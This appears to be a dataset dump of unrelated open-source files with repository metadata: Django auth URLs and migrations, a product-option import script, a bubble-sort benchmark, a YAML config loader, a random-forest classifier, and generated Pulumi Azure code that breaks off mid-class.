    # Password reset: request form -> confirmation email -> token link -> done.
    url(r'^reset/$',
        auth_views.PasswordResetView.as_view(
            template_name='password_reset.html',
            email_template_name='password_reset_email.html',
            subject_template_name='password_reset_subject.txt'
        ), name='password_reset'),
    url(r'^reset/done/$',
        auth_views.PasswordResetDoneView.as_view(template_name='password_reset_done.html'),
        name='password_reset_done'),
    url(r'^reset/(?P<uidb64>[0-9A-Za-z_\-]+)/(?P<token>[0-9A-Za-z]{1,13}-[0-9A-Za-z]{1,20})/$',
        auth_views.PasswordResetConfirmView.as_view(template_name='password_reset_confirm.html'),
        name='password_reset_confirm'),
    url(r'^reset/complete/$',
        auth_views.PasswordResetCompleteView.as_view(template_name='password_reset_complete.html'),
        name='password_reset_complete'),
    # Password change for already-authenticated users.
    url(r'^settings/password/$', auth_views.PasswordChangeView.as_view(template_name='password_change.html'),
        name='password_change'),
    url(r'^settings/password/done/$', auth_views.PasswordChangeDoneView.as_view(template_name='password_change_done.html'),
        name='password_change_done'),
]
# Serve static and media files from Django itself during development only.
if settings.DEBUG:
    urlpatterns = urlpatterns + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
    urlpatterns = urlpatterns + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT)
"spaceled@gmail.com"
] | spaceled@gmail.com |
2409997bcdd70bd01cfbf1426549351da8a013c4 | 8fcfb384245d9b36a6c5a3bab55dc3101da52627 | /App_login/migrations/0001_initial.py | 5dc2222836670c23baaae5e019a21f9a06600ef9 | [] | no_license | Maloy-Baroi/Kashfi-Jakaria | faa96e874cae8132ddb3117de0fe1c756b570da5 | ea574b4bdc5a2dd15c02c2f9bcc9e339982841b7 | refs/heads/main | 2023-04-27T19:20:03.199894 | 2021-05-01T16:11:29 | 2021-05-01T16:11:29 | 363,450,175 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,321 | py | # Generated by Django 3.2 on 2021-04-07 02:42
import django.contrib.auth.models
import django.contrib.auth.validators
from django.db import migrations, models
import django.utils.timezone
class Migration(migrations.Migration):
    """Initial App_login schema: an EmployeeID lookup table plus a custom
    User model (standard auth-user fields extended with employee_id and a
    profile picture)."""
    initial = True
    dependencies = [
        ('auth', '0012_alter_user_first_name_max_length'),
    ]
    operations = [
        migrations.CreateModel(
            name='EmployeeID',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('ids', models.CharField(max_length=20)),
            ],
        ),
        migrations.CreateModel(
            name='User',
            fields=[
                ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('password', models.CharField(max_length=128, verbose_name='password')),
                ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')),
                ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')),
                ('username', models.CharField(error_messages={'unique': 'A user with that username already exists.'}, help_text='Required. 150 characters or fewer. Letters, digits and @/./+/-/_ only.', max_length=150, unique=True, validators=[django.contrib.auth.validators.UnicodeUsernameValidator()], verbose_name='username')),
                ('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')),
                ('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')),
                ('email', models.EmailField(blank=True, max_length=254, verbose_name='email address')),
                ('is_staff', models.BooleanField(default=False, help_text='Designates whether the user can log into this admin site.', verbose_name='staff status')),
                ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')),
                ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')),
                # Custom fields beyond Django's stock user model.
                ('employee_id', models.CharField(max_length=20, unique=True)),
                ('profile_picture', models.ImageField(upload_to='librarian_photo')),
                ('groups', models.ManyToManyField(blank=True, help_text='The groups this user belongs to. A user will get all permissions granted to each of their groups.', related_name='user_set', related_query_name='user', to='auth.Group', verbose_name='groups')),
                ('user_permissions', models.ManyToManyField(blank=True, help_text='Specific permissions for this user.', related_name='user_set', related_query_name='user', to='auth.Permission', verbose_name='user permissions')),
            ],
            options={
                'verbose_name': 'user',
                'verbose_name_plural': 'users',
                'abstract': False,
            },
            managers=[
                ('objects', django.contrib.auth.models.UserManager()),
            ],
        ),
    ]
| [
"teamexplorer171@gmail.com"
] | teamexplorer171@gmail.com |
57b2cd00a87e389e7a38f77e87aeadee7dc8413d | a0a0932b6ab6ec47c2757d8929216790f5bc6535 | /import_productitem.py | 7c614f08aadb009ebc8072d22b30f9530d115aa9 | [] | no_license | lianglunzhong/latte-erp | b4e6e3b13c4bce17911ff166fecc36172e0bea5b | b58936c8d9917f3efdcb3585c54bfd3aba4723c2 | refs/heads/master | 2022-11-27T03:08:23.780124 | 2017-04-28T02:51:43 | 2017-04-28T02:51:43 | 89,660,834 | 0 | 0 | null | 2022-11-22T01:04:12 | 2017-04-28T02:48:50 | Python | UTF-8 | Python | false | false | 3,751 | py | # -*- coding: utf-8 -*-
# One-off Django data-migration script (Python 2: `print` statements,
# `reload(sys)`, `dict.has_key`, `iteritems`).  Phase 1 parses each
# product's '#'-separated size description into Option links on its
# ProductAttributes; the `exit()` below makes phase 2 (CSV export of
# category/option data) dead code unless it is removed.
import datetime
from django.utils import timezone
import sys, os
reload(sys)
sys.setdefaultencoding('utf-8')
import csv
sys.path.append(os.getcwd())
os.environ['DJANGO_SETTINGS_MODULE'] = 'project.settings'
import django
django.setup()
from product.models import *
from order.models import *
# Generate attribute items from products and their product attributes.
products = Product.objects.all().order_by('id')
# products = Product.objects.filter(id=5393)
for p in products:
    # print 'cate',p.category_id,p.description
    category = Category.objects.get(pk=p.category_id)
    # Update the product SKU code (kept disabled).
    # p.sku = str(category.code)+str(p.id)
    # p.sku = u"%s%06d" % (category.code, p.id)
    # p.save()
    # for attribute in category.attributes.all().exclude(id=11):
    #     # print 'attr_id',attribute.id
    #     product_attribute, is_created = ProductAttribute.objects.get_or_create(attribute_id=attribute.id,product_id=p.id)
    # Attribute id 11 is excluded -- presumably a non-size attribute; TODO confirm.
    product_attributes = ProductAttribute.objects.filter(product_id=p.id).exclude(attribute_id=11)
    for product_attribute in product_attributes:
        # print product_attribute.attribute_id
        options = p.description.split('#')
        for opx in options:
            # Normalize a raw size token, e.g. 'SIZE: xl ' -> 'XL'.
            op = opx.replace('SIZE:', '').replace(' ', '').strip().upper()
            if "ONE" in op:
                op = 'ONESIZE'
            elif not op:
                op = 'ONESIZE'
                print 'not op', opx
            elif op in ('????', "均码",'???','error'):
                op = 'ONESIZE'
                print 'is ?', opx
            elif op == 'X':
                op = "XL"
            elif len(op) == 3 and op[1:] == 'XL' and op[0] != 'X':
                # Expand numeric prefixes: '2XL' -> 'XXL', '3XL' -> 'XXXL'.
                try:
                    op = int(op[0]) * 'X' + 'L'
                except Exception,e:
                    print opx,'#', p.id,'#', p.sku,'#', p.choies_sku
            # print 'op',op
            try:
                option = Option.objects.get(name=op,attribute_id=product_attribute.attribute_id)
                product_attribute.options.add(option)
                # # item_str = str(p.id) +'-0-'+str(option.id)
                # item_str = str(p.id) +'-'+str(option.id)
                # # item_sku = u"%s-0-%s"% (p.sku,option.name)
                # item_sku = u"%s%s"% (p.sku,option.code)
                # item, is_created = Item.objects.get_or_create(product_id=p.id, key=item_str,sku=item_sku)
                # # print 'item_str',item_str
                # # Generate a choies-channel alias for the sku under the ws system.
                # sku_str = str(p.choies_sku)+'-'+str(option.name)
                # # print 'sku_str',sku_str,'item_id',item.id
                # Alias.objects.get_or_create(sku=sku_str,channel_id=1,item_id=item.id)
            except Exception,e:
                print opx,'#', p.id,'#', p.sku,'#', p.choies_sku,'# save no',e
exit()
# Collect all categories currently in the product table together with their
# attribute options, and dump them to category_data.csv.  (Dead code: the
# exit() above stops the script first.)
products = Product.objects.filter(id__gte=306).values('category_id','description').distinct()
temp = {}
i=0
for p in products:
    # print p
    i= i+1
    # print p.category_id,p.description
    if temp.has_key(p['category_id']):
        temp[p['category_id']] = temp[p['category_id']] + '#'+p['description']
    else:
        temp[p['category_id']] = p['description']
fieldnames = ['分类id', '属性选项']
dict_writer = csv.writer(open('category_data.csv','wb'))
dict_writer.writerow(fieldnames)
for key,value in temp.iteritems():
    temp[key] = value.split('#')
    temp[key] = list(set(temp[key]))
    cate = Category.objects.filter(id=key,id__gte=354).values('name')
    print cate[0]['name']
    temp2 = [key, cate[0]['name'], '#'.join(str(e) for e in temp[key])]
    dict_writer.writerow(temp2)
print temp
exit()
| [
"liang.lunzhong@wxzeshang.com"
] | liang.lunzhong@wxzeshang.com |
422b9b9dea57e7b36524f766a58b150170c93d89 | 68fd6dedf67e67f567475b06dd209b1c62a4c1aa | /app.py | a8d7a4cb550323ef5a9c361db2b0b44aeda04bf0 | [] | no_license | cassandrazhou/bubble_sort | 766b1fd6dafa47808a5f878dd66bbf890da78f58 | 8b2480df5d72bba8a7565b9b9aa3f8ab6e902a21 | refs/heads/main | 2023-07-08T05:53:22.855317 | 2021-08-21T13:57:04 | 2021-08-21T13:57:04 | 398,570,448 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 514 | py | import bubble_sort
import time
# Benchmark fixture: a small unsorted list of integers (duplicates included).
L = [2, 5, 31, 6, 8, 4, 7, 9, 1, 42, 52, 35, 100, 11, 0, 13, 19, 71, 47, 3089, 231, 482, 91238, 432, 43, 6, 87, 33, 57, 981, 24, 19, 22, 1001]

# Use time.perf_counter() rather than time.time(): perf_counter is a
# monotonic, high-resolution clock meant for interval timing, while
# time.time() is wall-clock and can jump (e.g. NTP adjustments).
# Each sort gets its own copy of L so the second run is not handed input
# that the first run may already have sorted in place.
start_long = time.perf_counter()
bubble_sort.BubbleSort_long(list(L))
end_long = time.perf_counter()
print("The LONG version of BubbleSort took {} seconds.".format(end_long - start_long))
start_short = time.perf_counter()
bubble_sort.BubbleSort_short(list(L))
end_short = time.perf_counter()
print("The SHORT version of BubbleSort took {} seconds.".format(end_short - start_short)) | [
"noreply@github.com"
] | cassandrazhou.noreply@github.com |
b2221a99054c2bd032ff2e756d2c70e772bb434b | 233b2958c853dc57dfa5d54caddbc1520dcc35c8 | /ava/runtime/config.py | 4e76f2a43ffde0aeb8268ac973bff3b13fc8e9f6 | [] | no_license | eavatar/ava.node | 6295ac6ed5059ebcb6ce58ef6e75adf1bfa24ed7 | 71e3304d038634ef13f44d245c3838d276a275e6 | refs/heads/master | 2021-01-19T06:13:01.127585 | 2015-06-03T03:10:59 | 2015-06-03T03:10:59 | 33,645,210 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,473 | py | # -*- coding: utf-8 -*-
"""
Configuration file reading/writing.
"""
from __future__ import absolute_import, division, print_function, \
unicode_literals
import codecs
import logging
import logging.config
import os.path
from string import Template
from yaml import load, dump
try:
from yaml import CLoader as Loader, CDumper as Dumper
except ImportError:
from yaml import Loader, Dumper
from ava.runtime import environ
# Path of the main agent configuration file inside the conf directory.
AGENT_CONF = os.path.join(environ.conf_dir(), u'ava.yml')
# The default configuration file is located at the base directory.
# These values are also the ${...} placeholders available to Template
# substitution when config files are loaded (see load_conf below).
settings = dict(base_dir=environ.base_dir(),
                conf_dir=environ.conf_dir(),
                data_dir=environ.data_dir(),
                pkgs_dir=environ.pkgs_dir(),
                logs_dir=environ.logs_dir(),
                mods_dir=environ.mods_dir(),
                )
def load_conf(conf_file):
    """Load a YAML configuration file, expanding ``${...}`` placeholders.

    Placeholders are substituted from the module-level ``settings`` mapping
    before parsing.  Returns an empty dict when the file is missing or
    contains only whitespace.
    """
    if not os.path.exists(conf_file):
        return {}
    # Close the handle deterministically; the original leaked it until GC.
    with codecs.open(conf_file, 'rb', encoding='utf-8') as fp:
        data = fp.read()
    if len(data.strip()) == 0:
        return {}
    # Expand ${base_dir}, ${conf_dir}, ... before handing the text to YAML.
    template = Template(data)
    data = template.substitute(**settings)
    return load(data, Loader=Loader)
def save_conf(conf_file, content):
    """Serialize ``content`` to ``conf_file`` as block-style YAML.

    Uses a ``with`` block so the handle is flushed and closed even on
    error; the original opened the file and never closed it.
    """
    with codecs.open(conf_file, 'wb', encoding='utf-8') as out:
        out.write(dump(content, Dumper=Dumper, default_flow_style=False,
                       indent=4, width=80))
# Overlay values from the on-disk agent config over the built-in defaults.
settings.update(load_conf(AGENT_CONF))
# configure logging
# The 'logging' key is expected to be a dictConfig-style mapping -- this
# raises KeyError if the agent config does not provide it.
logging.config.dictConfig(settings['logging'])
| [
"sam@eavatar.com"
] | sam@eavatar.com |
dcd47627904d58842a015087332ea70bcf3781d8 | 62d61baf359eefbd77ca630bac3042132f41e710 | /randomforest.py | 36e3502ed48c5c7053ed59f32178d6592ce24dd9 | [] | no_license | garou99/petadoption | 6723084b862561eb5377a49f0066b4405ee8a7de | a84f934256d2367964abe177bda95dbe3796e856 | refs/heads/master | 2023-03-12T06:16:03.703674 | 2021-02-20T17:19:45 | 2021-02-20T17:19:45 | 340,438,598 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,770 | py | import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
# Pet-adoption pipeline: load train/test CSVs, engineer date features,
# scale, then fit a RandomForest on the breed_category target.
dataset1=pd.read_csv("train.csv")
dataset2=pd.read_csv("test.csv")
y1=dataset1["breed_category"]
y2=dataset1["pet_category"]
dataset1.drop(["breed_category","pet_category"],axis=1,inplace=True)
# Stack train and test so feature engineering is applied uniformly.
dataset=pd.concat((dataset1,dataset2)).reset_index(drop=True)
dataset.drop(["pet_id"],axis=1,inplace=True)
#print(dataset["condition"].value_counts())
# Missing 'condition' is encoded as the sentinel -1.
dataset['condition'].fillna(-1,inplace=True)
dataset['issue_date']=pd.to_datetime(dataset['issue_date'])
dataset['listing_date']=pd.to_datetime(dataset['listing_date'])
x=[]
for d in dataset['issue_date']:
    x.append(d.month)
dataset['issue_month']=x
x=[]
for d in dataset['listing_date']:
    x.append(d.month)
dataset['listing_month']=x
# Convert each date to a fractional-year float so dates can be subtracted.
x=[]
for d in dataset['issue_date']:
    x.append(d.year+(d.month/12.0)+(d.day/365.0))
dataset['issue_date']=x
x=[]
for d in dataset['listing_date']:
    x.append(d.year+(d.month/12.0)+(d.day/365.0))
dataset['listing_date']=x
# 'time' = elapsed (fractional years) between issue and listing.
dataset['time']=abs(dataset['listing_date']-dataset['issue_date'])
dataset.drop(['listing_date','issue_date'],axis=1,inplace=True)
# NOTE(review): assigning get_dummies() output to a single column keeps only
# the first dummy column, not a real one-hot encoding -- verify intent.
dataset['color_type']=pd.get_dummies(dataset['color_type'])
# NOTE(review): 'train' is never used afterwards.
train=dataset.iloc[:,:].values
from sklearn.preprocessing import StandardScaler
sc_x=StandardScaler()
# NOTE(review): scaler is fit on train+test combined -- leaks test
# statistics into training; fit on the first 18834 (train) rows only.
dataset=sc_x.fit_transform(dataset)
from sklearn.model_selection import train_test_split
# First 18834 rows are the labelled training portion of the stacked frame.
xtrain,xtest,ytrain,ytest=train_test_split(dataset[:18834],y1,test_size=0.2)
from sklearn.ensemble import RandomForestClassifier
classifier=RandomForestClassifier(n_estimators=10,criterion="entropy",random_state=0)
classifier.fit(xtrain,ytrain)
ypredict=classifier.predict(xtest)
from sklearn.metrics import classification_report,confusion_matrix
print(classification_report(ytest,ypredict)) | [
"vaibhavvashist9999@gmail.com"
] | vaibhavvashist9999@gmail.com |
6fe1caf5a0fd9e62133dffde475eb704b5b0b5ee | 6d9112d77b2864ac2d4b8b3135149f1c8eb07901 | /leadership_styles/migrations/0001_initial.py | c4b1c9c95e1993a8180603efaf6d4fc64868b520 | [] | no_license | predictable-success/predictable_success | 77b880cefe0fe363572bc43f72ac558c405c820e | 7cdbdcd5686781b4ac8bf4a3cd60c34ac4cee0f5 | refs/heads/master | 2021-01-19T01:09:10.251217 | 2017-05-05T17:39:29 | 2017-05-05T17:39:29 | 64,931,697 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,323 | py | # -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
import datetime
class Migration(migrations.Migration):
    """Initial leadership_styles schema: Answer, EmployeeLeadershipStyle and
    Question models plus the two FK fields added after model creation to
    break the Question<->Answer/EmployeeLeadershipStyle dependency cycle."""
    dependencies = [
        ('org', '0001_initial'),
    ]
    operations = [
        migrations.CreateModel(
            name='Answer',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('text', models.TextField(default=b'', blank=True)),
                ('leadership_style', models.IntegerField(choices=[(0, b'Visionary'), (1, b'Operator'), (2, b'Processor'), (3, b'Synergist')])),
                ('order', models.IntegerField(default=0)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='EmployeeLeadershipStyle',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('date', models.DateTimeField(default=datetime.datetime.now)),
                ('times_retaken', models.IntegerField(default=0)),
                ('notes', models.TextField(default=b'', blank=True)),
                ('is_draft', models.BooleanField(default=False)),
                ('active', models.BooleanField(default=False)),
                ('completed', models.BooleanField(default=False)),
                ('visionary_score', models.IntegerField()),
                ('operator_score', models.IntegerField()),
                ('processor_score', models.IntegerField()),
                ('synergist_score', models.IntegerField()),
                ('answers', models.ManyToManyField(related_name='+', null=True, to='leadership_styles.Answer', blank=True)),
                ('assessor', models.ForeignKey(related_name='+', to='org.Employee')),
                ('employee', models.ForeignKey(related_name='employee_leadership_styles', to='org.Employee')),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.CreateModel(
            name='Question',
            fields=[
                ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),
                ('text', models.TextField()),
                ('randomize_answers', models.BooleanField(default=False)),
                ('randomize_next_questions', models.BooleanField(default=False)),
                ('order', models.IntegerField(default=0)),
                ('previous_question', models.ForeignKey(related_name='next_questions', blank=True, to='leadership_styles.Question', null=True)),
            ],
            options={
            },
            bases=(models.Model,),
        ),
        migrations.AddField(
            model_name='employeeleadershipstyle',
            name='last_question_answered',
            field=models.ForeignKey(related_name='+', blank=True, to='leadership_styles.Question', null=True),
            preserve_default=True,
        ),
        migrations.AddField(
            model_name='answer',
            name='question',
            field=models.ForeignKey(related_name='_answers', to='leadership_styles.Question', null=True),
            preserve_default=True,
        ),
    ]
| [
"mcmahon.nate@gmail.com"
] | mcmahon.nate@gmail.com |
23ff794c191939821dfe1e0a1e6ee0c35f90e884 | e5e2b7da41fda915cb849f031a0223e2ac354066 | /sdk/python/pulumi_azure_native/desktopvirtualization/v20201019preview/application_group.py | 2faebd8d2ef7474036d1b9203e874ce21b32a2a9 | [
"BSD-3-Clause",
"Apache-2.0"
] | permissive | johnbirdau/pulumi-azure-native | b7d3bdddeb7c4b319a7e43a892ddc6e25e3bfb25 | d676cc331caa0694d8be99cb90b93fa231e3c705 | refs/heads/master | 2023-05-06T06:48:05.040357 | 2021-06-01T20:42:38 | 2021-06-01T20:42:38 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,527 | py | # coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from ._enums import *
__all__ = ['ApplicationGroupArgs', 'ApplicationGroup']
@pulumi.input_type
class ApplicationGroupArgs:
def __init__(__self__, *,
application_group_type: pulumi.Input[Union[str, 'ApplicationGroupType']],
host_pool_arm_path: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
application_group_name: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
friendly_name: Optional[pulumi.Input[str]] = None,
location: Optional[pulumi.Input[str]] = None,
tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None):
"""
The set of arguments for constructing a ApplicationGroup resource.
:param pulumi.Input[Union[str, 'ApplicationGroupType']] application_group_type: Resource Type of ApplicationGroup.
:param pulumi.Input[str] host_pool_arm_path: HostPool arm path of ApplicationGroup.
:param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
:param pulumi.Input[str] application_group_name: The name of the application group
:param pulumi.Input[str] description: Description of ApplicationGroup.
:param pulumi.Input[str] friendly_name: Friendly name of ApplicationGroup.
:param pulumi.Input[str] location: The geo-location where the resource lives
:param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
"""
pulumi.set(__self__, "application_group_type", application_group_type)
pulumi.set(__self__, "host_pool_arm_path", host_pool_arm_path)
pulumi.set(__self__, "resource_group_name", resource_group_name)
if application_group_name is not None:
pulumi.set(__self__, "application_group_name", application_group_name)
if description is not None:
pulumi.set(__self__, "description", description)
if friendly_name is not None:
pulumi.set(__self__, "friendly_name", friendly_name)
if location is not None:
pulumi.set(__self__, "location", location)
if tags is not None:
pulumi.set(__self__, "tags", tags)
@property
@pulumi.getter(name="applicationGroupType")
def application_group_type(self) -> pulumi.Input[Union[str, 'ApplicationGroupType']]:
"""
Resource Type of ApplicationGroup.
"""
return pulumi.get(self, "application_group_type")
@application_group_type.setter
def application_group_type(self, value: pulumi.Input[Union[str, 'ApplicationGroupType']]):
pulumi.set(self, "application_group_type", value)
@property
@pulumi.getter(name="hostPoolArmPath")
def host_pool_arm_path(self) -> pulumi.Input[str]:
"""
HostPool arm path of ApplicationGroup.
"""
return pulumi.get(self, "host_pool_arm_path")
@host_pool_arm_path.setter
def host_pool_arm_path(self, value: pulumi.Input[str]):
pulumi.set(self, "host_pool_arm_path", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The name of the resource group. The name is case insensitive.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="applicationGroupName")
def application_group_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the application group
"""
return pulumi.get(self, "application_group_name")
@application_group_name.setter
def application_group_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "application_group_name", value)
@property
@pulumi.getter
def description(self) -> Optional[pulumi.Input[str]]:
"""
Description of ApplicationGroup.
"""
return pulumi.get(self, "description")
@description.setter
def description(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "description", value)
@property
@pulumi.getter(name="friendlyName")
def friendly_name(self) -> Optional[pulumi.Input[str]]:
"""
Friendly name of ApplicationGroup.
"""
return pulumi.get(self, "friendly_name")
@friendly_name.setter
def friendly_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "friendly_name", value)
@property
@pulumi.getter
def location(self) -> Optional[pulumi.Input[str]]:
"""
The geo-location where the resource lives
"""
return pulumi.get(self, "location")
@location.setter
def location(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "location", value)
@property
@pulumi.getter
def tags(self) -> Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]:
"""
Resource tags.
"""
return pulumi.get(self, "tags")
@tags.setter
def tags(self, value: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]]):
pulumi.set(self, "tags", value)
# NOTE: auto-generated by the Pulumi SDK generator (see file header);
# prefer regenerating from the Azure API schema over hand-editing.
class ApplicationGroup(pulumi.CustomResource):
    @overload
    def __init__(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 application_group_name: Optional[pulumi.Input[str]] = None,
                 application_group_type: Optional[pulumi.Input[Union[str, 'ApplicationGroupType']]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 friendly_name: Optional[pulumi.Input[str]] = None,
                 host_pool_arm_path: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 __props__=None):
        """
        Represents a ApplicationGroup definition.

        :param str resource_name: The name of the resource.
        :param pulumi.ResourceOptions opts: Options for the resource.
        :param pulumi.Input[str] application_group_name: The name of the application group
        :param pulumi.Input[Union[str, 'ApplicationGroupType']] application_group_type: Resource Type of ApplicationGroup.
        :param pulumi.Input[str] description: Description of ApplicationGroup.
        :param pulumi.Input[str] friendly_name: Friendly name of ApplicationGroup.
        :param pulumi.Input[str] host_pool_arm_path: HostPool arm path of ApplicationGroup.
        :param pulumi.Input[str] location: The geo-location where the resource lives
        :param pulumi.Input[str] resource_group_name: The name of the resource group. The name is case insensitive.
        :param pulumi.Input[Mapping[str, pulumi.Input[str]]] tags: Resource tags.
        """
        ...
    @overload
    def __init__(__self__,
                 resource_name: str,
                 args: ApplicationGroupArgs,
                 opts: Optional[pulumi.ResourceOptions] = None):
        """
        Represents a ApplicationGroup definition.

        :param str resource_name: The name of the resource.
        :param ApplicationGroupArgs args: The arguments to use to populate this resource's properties.
        :param pulumi.ResourceOptions opts: Options for the resource.
        """
        ...
    def __init__(__self__, resource_name: str, *args, **kwargs):
        # Dispatch between the (args-object) and (keyword) overloads above.
        resource_args, opts = _utilities.get_resource_args_opts(ApplicationGroupArgs, pulumi.ResourceOptions, *args, **kwargs)
        if resource_args is not None:
            __self__._internal_init(resource_name, opts, **resource_args.__dict__)
        else:
            __self__._internal_init(resource_name, *args, **kwargs)
    def _internal_init(__self__,
                 resource_name: str,
                 opts: Optional[pulumi.ResourceOptions] = None,
                 application_group_name: Optional[pulumi.Input[str]] = None,
                 application_group_type: Optional[pulumi.Input[Union[str, 'ApplicationGroupType']]] = None,
                 description: Optional[pulumi.Input[str]] = None,
                 friendly_name: Optional[pulumi.Input[str]] = None,
                 host_pool_arm_path: Optional[pulumi.Input[str]] = None,
                 location: Optional[pulumi.Input[str]] = None,
                 resource_group_name: Optional[pulumi.Input[str]] = None,
                 tags: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                 __props__=None):
        if opts is None:
            opts = pulumi.ResourceOptions()
        if not isinstance(opts, pulumi.ResourceOptions):
            raise TypeError('Expected resource options to be a ResourceOptions instance')
        if opts.version is None:
            opts.version = _utilities.get_version()
        if opts.id is None:
            if __props__ is not None:
                raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
            __props__ = ApplicationGroupArgs.__new__(ApplicationGroupArgs)
            __props__.__dict__["application_group_name"] = application_group_name
            if application_group_type is None and not opts.urn:
                raise TypeError("Missing required property 'application_group_type'")
            __props__.__dict__["application_group_type"] = application_group_type
            __props__.__dict__["description"] = description
            __props__.__dict__["friendly_name"] = friendly_name
            if host_pool_arm_path is None and not opts.urn:
                raise TypeError("Missing required property 'host_pool_arm_path'")
            __props__.__dict__["host_pool_arm_path"] = host_pool_arm_path
            __props__.__dict__["location"] = location
            if resource_group_name is None and not opts.urn:
                raise TypeError("Missing required property 'resource_group_name'")
            __props__.__dict__["resource_group_name"] = resource_group_name
            __props__.__dict__["tags"] = tags
            __props__.__dict__["name"] = None
            __props__.__dict__["type"] = None
            __props__.__dict__["workspace_arm_path"] = None
        # Aliases for every historical API version of this resource type, so
        # existing stacks keep tracking it across provider upgrades.
        alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201019preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20190123preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20190123preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20190924preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20190924preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20191210preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20191210preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20200921preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20200921preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20201102preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201102preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20201110preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20201110preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210114preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210114preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210201preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210201preview:ApplicationGroup"), pulumi.Alias(type_="azure-native:desktopvirtualization/v20210309preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210309preview:ApplicationGroup"), 
pulumi.Alias(type_="azure-native:desktopvirtualization/v20210401preview:ApplicationGroup"), pulumi.Alias(type_="azure-nextgen:desktopvirtualization/v20210401preview:ApplicationGroup")])
        opts = pulumi.ResourceOptions.merge(opts, alias_opts)
        super(ApplicationGroup, __self__).__init__(
            'azure-native:desktopvirtualization/v20201019preview:ApplicationGroup',
            resource_name,
            __props__,
            opts)
    @staticmethod
    def get(resource_name: str,
            id: pulumi.Input[str],
            opts: Optional[pulumi.ResourceOptions] = None) -> 'ApplicationGroup':
        """
        Get an existing ApplicationGroup resource's state with the given name, id, and optional extra
        properties used to qualify the lookup.

        :param str resource_name: The unique name of the resulting resource.
